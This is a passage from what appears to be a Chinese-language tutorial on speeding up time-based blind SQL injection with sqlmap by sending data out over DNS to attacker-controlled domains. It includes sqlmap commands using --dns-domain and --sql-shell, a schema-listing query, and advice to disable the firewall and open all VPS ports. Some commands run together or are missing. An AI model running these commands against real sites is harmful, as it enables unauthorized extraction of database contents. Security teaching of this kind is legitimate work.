第十五步:故障排查
如果无法正常收到DNS请求,那么可能是防火墙策略。关闭Ubuntu防火墙的命令是:sudoufwdisable
也可能是或者VPS上存在安全策略阻塞,再去VPS控制台上检测是否存在安全组策略,全部放通即可。例如华为VPS默认只开发部分端口,手动勾选全部放通即可。
四、使用sqlmap利用OOB技术快速突破盲注 4.1 VPS上python环境的安装
一般vps均自带python2的环境,因此python2的环境不需要再次安装。在114.114.123.120中安装sqlmap,sqlmap的安装命令为: git clonegit://github.com/sqlmapproject/sqlmap.git,安装好后,进入sqlmap目录,并执行python sqlmap.py,看能够正常回显即可正常使用sqlmap
4.2与盲注的时间对比
sqlmap指定使用时间盲注方式注入,并读取当前数据库名的命令如下:
python sqlmap.py -u "?id=1"--tech=T --dbms=mysql --current-db --batch
先演示使用传统的sqlmap时间盲注,8个字母耗时1分46秒,如下图所示。
再使用基于DNS的OOB技术进行注入,为了避免作弊,首先要清除上一次sql注入的缓存。缓存文件位置和清除命令如下:
接着使用本文介绍的sqlmap基于dns通道进行OOB注入,仅仅耗时1秒,执行时间盲注的命令如下:
python sqlmap.py -u "?id=1"--tech=T --dbms=mysql --dns-domain=fuzi666.xyz --current-db –batch
4.3利用sql-shell快速获取数据
弹个sql-shell回来:
python sqlmap.py -u "?id=1"--tech=T --dbms=mysql --dns-domain=13fuzi.com --sql-shell --batch
查询数据库名,耗时4秒。查询数据库名的sql语句如下:
select schema_name frominformation_schema.schemata;
参考资料:
https://www.cnblogs.com/backlion/p/8984121.html